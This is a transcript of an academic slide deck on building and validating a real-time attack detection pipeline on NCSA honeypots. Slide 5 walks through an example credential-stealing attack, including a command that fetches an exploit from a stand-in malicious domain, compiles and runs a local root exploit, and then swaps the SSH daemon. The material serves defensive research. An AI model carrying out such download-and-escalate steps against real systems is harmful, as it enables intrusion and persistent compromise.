+ All Categories
Home > Documents > Scalable Data Analytics Pipeline for Real-Time Attack...

Scalable Data Analytics Pipeline for Real-Time Attack...

Date post: 26-Jul-2020
Category:
Upload: others
View: 8 times
Download: 0 times
Share this document with a friend
30
Scalable Data Analytics Pipeline for Real - Time Attack Detection; Design, Validation, and Deployment in a Honeypot Environment Eric Badger Master’s Student Computer Engineering 1
Transcript
Page 1: Scalable Data Analytics Pipeline for Real-Time Attack ...publish.illinois.edu/science-of-security-lablet/files/2015/09/10062015-Eric-Badger...Pipeline Design Pipeline Deployment Validation

Scalable Data Analytics Pipeline for Real-Time Attack Detection; Design, Validation, and Deployment in a Honeypot EnvironmentEric BadgerMaster’s StudentComputer Engineering

1

Page 2: Scalable Data Analytics Pipeline for Real-Time Attack ...publish.illinois.edu/science-of-security-lablet/files/2015/09/10062015-Eric-Badger...Pipeline Design Pipeline Deployment Validation

Overview▪ Introduction/Motivation▪ Challenges▪ Pipeline Design▪ Pipeline Deployment▪ Validation of Alerts and Attack Detection Tools▪ Future Work▪ Conclusion

2

Presenter
Presentation Notes
Main focus of this talk is practical challenges
Page 3: Scalable Data Analytics Pipeline for Real-Time Attack ...publish.illinois.edu/science-of-security-lablet/files/2015/09/10062015-Eric-Badger...Pipeline Design Pipeline Deployment Validation

Research ProblemOur goal is to detect potential attacks as early as possible. Security analysts attempt to detect and prevent attacks, but they can’t analyze everything in their infrastructure by hand. They need tools to automate the analysis for early detection of attacks.▪ How do we transition attack detection models from theory to practice?▪ How do we validate that the alerts we are using are useful?

Does combining alerts from different monitors make the attack detection better?Is the extra performance overhead worth it?

▪ How do we validate that our attack detection model is adequate and better than others?

What models are suitable for real-time attack detection in practical deployment?

3

Presenter
Presentation Notes
Don’t spend too much time
Page 4: Scalable Data Analytics Pipeline for Real-Time Attack ...publish.illinois.edu/science-of-security-lablet/files/2015/09/10062015-Eric-Badger...Pipeline Design Pipeline Deployment Validation

Research Challenges:Transitioning Attack Detection from Theory to Practice

▪ Identifying which alerts are useful for attack detection▪ Normalizing all logs to a common format▪ Achieving both high-accuracy and real-time attack detection▪ Achieving high-accuracy attack detection in the face of alert

randomness, noise, and imperfect monitors▪ Scaling the data pipeline

The chain of tools used for data-driven attack detection

4

Presenter
Presentation Notes
To achieve the transition from theory to practice, these are the challenges we must overcome
Page 5: Scalable Data Analytics Pipeline for Real-Time Attack ...publish.illinois.edu/science-of-security-lablet/files/2015/09/10062015-Eric-Badger...Pipeline Design Pipeline Deployment Validation

Attacker

Target System

Firewall OpenSSH

Bro IDS File Integrity Monitor Syslog

Legitimate Users

$ wget server6.bad-domain.com/vm.c

Connecting to xx.yy.zz.tt:80… connected.HTTP 1.1 GET /vm.c 200 OK

3. Download exploit

4. Escalate privilege$ gcc vm.c -o a; ./a

Linux vmsplice Local Root Exploit [+] mmap: 0xAABBCCDD[+] page: 0xDDEEFFGG…# whoami root

2. OS fingerprinting

$ uname -a; wLinux 2.6.xx, up 1:17, 1 userUSER TTY LOGIN@ IDLExxx console 18:40 1:16

1. Login remotelysshd: Accepted <user> from <remote>

5. Replace SSH daemonsshd: Received SIGHUP; restarting.

alice:password123bob:password456…

Password guessingEmail phishingSocial engineering

alice:password123bob:password456…

Example Attack Scenario

5

Presenter
Presentation Notes
“Let me show you an attack scenario that illustrates the difficulty of the problem. Here is an example of a credential-stealing attack at NCSA” “Looking at the events in isolation may not be sufficient to detect an attack, we need to correlate them together” “Now that we have gone through the example, how do we actually detect this attack?” Don’t spend too much time here.
Page 6: Scalable Data Analytics Pipeline for Real-Time Attack ...publish.illinois.edu/science-of-security-lablet/files/2015/09/10062015-Eric-Badger...Pipeline Design Pipeline Deployment Validation

How to Extract Important Alerts▪ Network Monitors

BroNetwork IDS used for packet analysis

CriticalStack Intel Feed▪ Host Monitors

OSSECRuns periodic system checks and file integrity monitoringAggregates and correlates all other host alerts

Snoopy LoggerLogs all execv system calls

RKHunterSearches for rootkits, hidden folders/files/ports, and other system issues

SyslogsNormal GNU/Linux “/var/log” logs, such as auth.log, kern.log, dpkg.log, and others

Bash LogsLogs Bash history as the commands are executed

6

Presenter
Presentation Notes
Bro created by UC-Berkeley, co-developed by NCSA
Page 7: Scalable Data Analytics Pipeline for Real-Time Attack ...publish.illinois.edu/science-of-security-lablet/files/2015/09/10062015-Eric-Badger...Pipeline Design Pipeline Deployment Validation

Log Normalization and Aggregation OSSEC Logs

RKHunter Logs

Auth Logs

Snoopy Logs

Bro Notice Logs

7

Epoch Time ISO 8601

Presenter
Presentation Notes
“Before I introduce the pipeline, let me introduce some key components. One of these components is log normalization. This shows the problem of needing to normalize heterogenous logs”
Page 8: Scalable Data Analytics Pipeline for Real-Time Attack ...publish.illinois.edu/science-of-security-lablet/files/2015/09/10062015-Eric-Badger...Pipeline Design Pipeline Deployment Validation

Log Normalization and Aggregation (2)▪ Since the logs are all in different formats, they need to be normalized to a

common format

8

Normalized Log

All logs needed to be centralized so that we can act on themTLS/SSL encryption is necessary to secure the movement of logs through the

pipelineIf not, the logs could be added, deleted, or changed by a MITM attack

Presenter
Presentation Notes
“Log aggregation is collecting all of the logs to a centralized location” timestamp, IP:user, alert, user state, attack state, received timestamp
Page 9: Scalable Data Analytics Pipeline for Real-Time Attack ...publish.illinois.edu/science-of-security-lablet/files/2015/09/10062015-Eric-Badger...Pipeline Design Pipeline Deployment Validation

Pipeline Design

Data Source

HoneypotsExample Tools

Generic Tools

● The Data Source can be any sort of online or offline computer or device

○ Online■ Honeypots, servers, workstations,

phones○ Offline

■ Security testbed, old logs● We use customized honeypots deployed at the

NCSA

9

Presenter
Presentation Notes
Be precise about what the data sources should be
Page 10: Scalable Data Analytics Pipeline for Real-Time Attack ...publish.illinois.edu/science-of-security-lablet/files/2015/09/10062015-Eric-Badger...Pipeline Design Pipeline Deployment Validation

Pipeline Design

10

Data Source Monitors

Bro

HoneypotsNetwork

Traffic/Raw Logs

Example Tools

Generic Tools

● The Monitors take in data and create alerts ● The data can be logs, network traffic, or anything

that can be alerted on● We use Bro, OSSEC, Snoopy Logger, RKHunter,

Syslogs, and Bash logs

Page 11: Scalable Data Analytics Pipeline for Real-Time Attack ...publish.illinois.edu/science-of-security-lablet/files/2015/09/10062015-Eric-Badger...Pipeline Design Pipeline Deployment Validation

Pipeline Design

11

Data Source Monitors Log Aggregation and Normalization

Bro

HoneypotsNetwork

Traffic/Raw Logs

AlertsExample Tools

Generic Tools

● The Log Aggregation and Normalization takes in alerts from multiple different inputs and normalizes them to a common format

● We use Logstash as the Log Aggregation tool

● We use Logstash filters to do the Log Normalization

● Logstash has integration with many other tools and has a large community base

Page 12: Scalable Data Analytics Pipeline for Real-Time Attack ...publish.illinois.edu/science-of-security-lablet/files/2015/09/10062015-Eric-Badger...Pipeline Design Pipeline Deployment Validation

Pipeline Design

12

Data Source Monitors Log Aggregation and Normalization

Message Queue

Bro

HoneypotsNetwork

Traffic/Raw Logs

AlertsExample Tools

Generic Tools

● The Message Queue deals with fluctuations in the throughput of alerts

● This prevents alert loss● We use Kafka, because

it is horizontally scalable and high-throughput

Presenter
Presentation Notes
Talk about how we have 2 divergent pathways. Explain “horizontally scalable”
Page 13: Scalable Data Analytics Pipeline for Real-Time Attack ...publish.illinois.edu/science-of-security-lablet/files/2015/09/10062015-Eric-Badger...Pipeline Design Pipeline Deployment Validation

Pipeline Design

13

Attack Detection

AttackTagger

Data Source Monitors Log Aggregation and Normalization

Message Queue

Bro

HoneypotsNetwork

Traffic/Raw Logs

AlertsExample Tools

Generic Tools

● The Attack Detection tool takes in alerts from the Message Queue and does analysis to detect attacks

● We use AttackTagger, which is an attack detection tool based on factor graphs

Presenter
Presentation Notes
Emphasize that this is a custom tool built in the DEPEND group “If I have time, we may talk more about this tool later”
Page 14: Scalable Data Analytics Pipeline for Real-Time Attack ...publish.illinois.edu/science-of-security-lablet/files/2015/09/10062015-Eric-Badger...Pipeline Design Pipeline Deployment Validation

AttackTagger

Pipeline Design

14

Log Storage Attack Detection

Data Source Monitors Log Aggregation and Normalization

Message Queue

Bro

HoneypotsNetwork

Traffic/Raw Logs

AlertsExample Tools

Generic Tools

● The Log Storage tool is used to store logs for post-mortem analysis

● We chose Elasticsearch because it integrates easily with Logstash and also because of its low indexing times

Page 15: Scalable Data Analytics Pipeline for Real-Time Attack ...publish.illinois.edu/science-of-security-lablet/files/2015/09/10062015-Eric-Badger...Pipeline Design Pipeline Deployment Validation

Pipeline Design

15

AttackTagger

Attack Detection

Log Storage Data Visualization

Data Source Monitors Log Aggregation and Normalization

Message Queue

Bro

HoneypotsNetwork

Traffic/Raw Logs

AlertsExample Tools

Generic Tools

● The Data Visualization tool allows System Administrators to see large amounts of data in a concise space

● We chose Kibana because it has comprehensive visualization and also integrates well with Elasticsearch

Page 16: Scalable Data Analytics Pipeline for Real-Time Attack ...publish.illinois.edu/science-of-security-lablet/files/2015/09/10062015-Eric-Badger...Pipeline Design Pipeline Deployment Validation

16

Presenter
Presentation Notes
In AttackTagger, we can log SSH IP’s across the world
Page 17: Scalable Data Analytics Pipeline for Real-Time Attack ...publish.illinois.edu/science-of-security-lablet/files/2015/09/10062015-Eric-Badger...Pipeline Design Pipeline Deployment Validation

Pipeline Design

17

Log Storage Attack Detection

Data Visualization

AttackTagger

Data Source Monitors Log Aggregation and Normalization

Message Queue

Bro

HoneypotsNetwork

Traffic/Raw Logs

AlertsExample Tools

Generic Tools

Presenter
Presentation Notes
“I’m showing you this, because I built this” Explain that there was much effort involved in creation
Page 18: Scalable Data Analytics Pipeline for Real-Time Attack ...publish.illinois.edu/science-of-security-lablet/files/2015/09/10062015-Eric-Badger...Pipeline Design Pipeline Deployment Validation

How Do I Know What Alerts Are Important?▪ Research was done in [1] and [2] that studied attacks

over a six-year period at NCSA. This research identified important alerts related to these attacks and developed the AttackTagger detection tool

▪ We utilized and extended a custom set of monitors to create alerts corresponding to the inputs that were used in AttackTagger

▪ In essence, we brought AttackTagger from a theoretical tool to actual deployment

[1] Phuong Cao, Key-whan Chung, Zbigniew Kalbarczyk, Ravishankar Iyer, and Adam J. Slagell. 2014. Preemptive intrusion detection. HotSoS '14.

[2] Phuong Cao, Eric Badger, Zbigniew Kalbarczyk, Ravishankar Iyer, and Adam Slagell. 2015. Preemptive intrusion detection: theoretical framework and real-world measurements. HotSoS '15.

18

Presenter
Presentation Notes
“I showed you the pipeline that is data-driven, but how do I determine what data to use?” “This is a lot of intellectual work”
Page 19: Scalable Data Analytics Pipeline for Real-Time Attack ...publish.illinois.edu/science-of-security-lablet/files/2015/09/10062015-Eric-Badger...Pipeline Design Pipeline Deployment Validation

What Can We Do with This Pipeline?▪ Both online and offline deployment ▪ Online

Analysis of attacks happening on the infrastructureAnalysis of attack detection tools on live data

▪ OfflinePost-mortem log analysis (via Elasticsearch/Kibana)Analysis of old attacksDevelopment of attack detection toolsValidation of alerts

19

Presenter
Presentation Notes
“I’ve talked about creating the pipeline, but what can I actually do with it?”
Page 20: Scalable Data Analytics Pipeline for Real-Time Attack ...publish.illinois.edu/science-of-security-lablet/files/2015/09/10062015-Eric-Badger...Pipeline Design Pipeline Deployment Validation

Honeypots at NCSA▪ NCSA server running several VMs

Honeypot VMsOpen to public

Monitoring VMAllows TCP Port 5000 (Logstash) from

honeypotsAllows TCP Port 22 from NCSA, UI, and UI

wirelessSends logs to Collector via Private Network

▪ Collector Allows TCP Port 5001 (Logstash) from private

networkAllows TCP Port 22 from NCSA, UI, and UI wireless

20

Monitoring VM Honeypot

VMs

External Collector

Public Network

Private Network

Presenter
Presentation Notes
Focus on how the honeypots are secure/low-risk Practical challenge is to make honeypots secure/low-risk
Page 21: Scalable Data Analytics Pipeline for Real-Time Attack ...publish.illinois.edu/science-of-security-lablet/files/2015/09/10062015-Eric-Badger...Pipeline Design Pipeline Deployment Validation

Honeypots at NCSA (2)

21

Presenter
Presentation Notes
Don’t spend much time here
Page 22: Scalable Data Analytics Pipeline for Real-Time Attack ...publish.illinois.edu/science-of-security-lablet/files/2015/09/10062015-Eric-Badger...Pipeline Design Pipeline Deployment Validation

Preliminary Honeypot Results▪ 3 separate SSH bruteforce attacks successfully compromised one of

the honeypots in the first 3 days▪ Appeared to download and execute either an open proxy or a DDoS

attack through the program “/tmp/squid64”▪ They beat my monitors! (Well, sort of...)

They pushed their malware from the anomalous host instead of pulling it from the honeypot

They deleted the malware immediately after running it, so it was not seen by OSSEC’s file-integrity monitoring

22

Presenter
Presentation Notes
We got calls about a machine doing rogue SSH bruteforce attacks SLOW DOWN on this slide. This slide is very interesting and important.
Page 23: Scalable Data Analytics Pipeline for Real-Time Attack ...publish.illinois.edu/science-of-security-lablet/files/2015/09/10062015-Eric-Badger...Pipeline Design Pipeline Deployment Validation

How to Validate Importance of Inputs (Alerts)▪ Mix and match which monitors/alerts that we use in our attack

detection▪ Evaluate the difference in attack detection coverage and accuracy

Adding monitors/alerts will likely add detection coverage because of extra data

Adding monitors/alerts could possibly decrease detection accuracy because of additional noise

▪ Determine whether the difference in detection coverage is worth the additional overhead

23

Presenter
Presentation Notes
Relate this to the pipeline Don’t overtalk
Page 24: Scalable Data Analytics Pipeline for Real-Time Attack ...publish.illinois.edu/science-of-security-lablet/files/2015/09/10062015-Eric-Badger...Pipeline Design Pipeline Deployment Validation

How to Validate Accuracy of Outputs (Detection Tools)▪ Compare and contrast different attack detection tools

e.g. Factor Graphs, Bayesian Networks, Markov Random Fields, Signature Detection, etc.

Which are most accurate?Which are least complex?

▪ In the pipeline, attack detection tools are plug and play as long as they can read the normalized alert format

If they can’t, a translation filter can be added

24

Presenter
Presentation Notes
Relate this to the pipeline
Page 25: Scalable Data Analytics Pipeline for Real-Time Attack ...publish.illinois.edu/science-of-security-lablet/files/2015/09/10062015-Eric-Badger...Pipeline Design Pipeline Deployment Validation

Future Work▪ Validate data pipeline inputs (alerts) and outputs (attack detection tools)▪ Add additional data types to data pipeline

Netflows

Full file-integrity monitoring (e.g. Tripwire)

Administrator-generated alerts/profiles

Keystroke data (e.g. iSSHD)▪ Convert detection model into a stream-processing system

Detectors such as AttackTagger are currently batch processing detectorsWe need to process the data in real-time

▪ Transition entire pipeline into practice at NCSA production system

25

Page 26: Scalable Data Analytics Pipeline for Real-Time Attack ...publish.illinois.edu/science-of-security-lablet/files/2015/09/10062015-Eric-Badger...Pipeline Design Pipeline Deployment Validation

Conclusion▪ Showed how to transition attack detection software from theory to

practice▪ Showed how to evaluate the effectiveness of the inputs (alerts) and

outputs (attack detection tools) of the pipeline▪ Identified challenges and how to overcome them

26

Page 27: Scalable Data Analytics Pipeline for Real-Time Attack ...publish.illinois.edu/science-of-security-lablet/files/2015/09/10062015-Eric-Badger...Pipeline Design Pipeline Deployment Validation

Special Thanks▪ Phuong Cao▪ Alex Withers▪ Adam Slagell▪ NCSA▪ DEPEND Research Group

27

Page 28: Scalable Data Analytics Pipeline for Real-Time Attack ...publish.illinois.edu/science-of-security-lablet/files/2015/09/10062015-Eric-Badger...Pipeline Design Pipeline Deployment Validation

Questions?

28

Page 29: Scalable Data Analytics Pipeline for Real-Time Attack ...publish.illinois.edu/science-of-security-lablet/files/2015/09/10062015-Eric-Badger...Pipeline Design Pipeline Deployment Validation

Citations[1] Phuong Cao, Key-whan Chung, Zbigniew Kalbarczyk, Ravishankar Iyer, and Adam J. Slagell. 2014.

Preemptive intrusion detection. In Proceedings of the 2014 Symposium and Bootcamp on the Science of Security (HotSoS '14). ACM, New York, NY, USA, , Article 21 , 2 pages. DOI=10.1145/2600176.2600197 http://doi.acm.org/10.1145/2600176.2600197

[2] Phuong Cao, Eric Badger, Zbigniew Kalbarczyk, Ravishankar Iyer, and Adam Slagell. 2015. Preemptive intrusion detection: theoretical framework and real-world measurements. In Proceedings of the 2015 Symposium and Bootcamp on the Science of Security (HotSoS '15). ACM, New York, NY, USA, , Article 5 , 12 pages. DOI=10.1145/2746194.2746199 http://doi.acm.org/10.1145/2746194.2746199

29

Page 30: Scalable Data Analytics Pipeline for Real-Time Attack ...publish.illinois.edu/science-of-security-lablet/files/2015/09/10062015-Eric-Badger...Pipeline Design Pipeline Deployment Validation

30


Recommended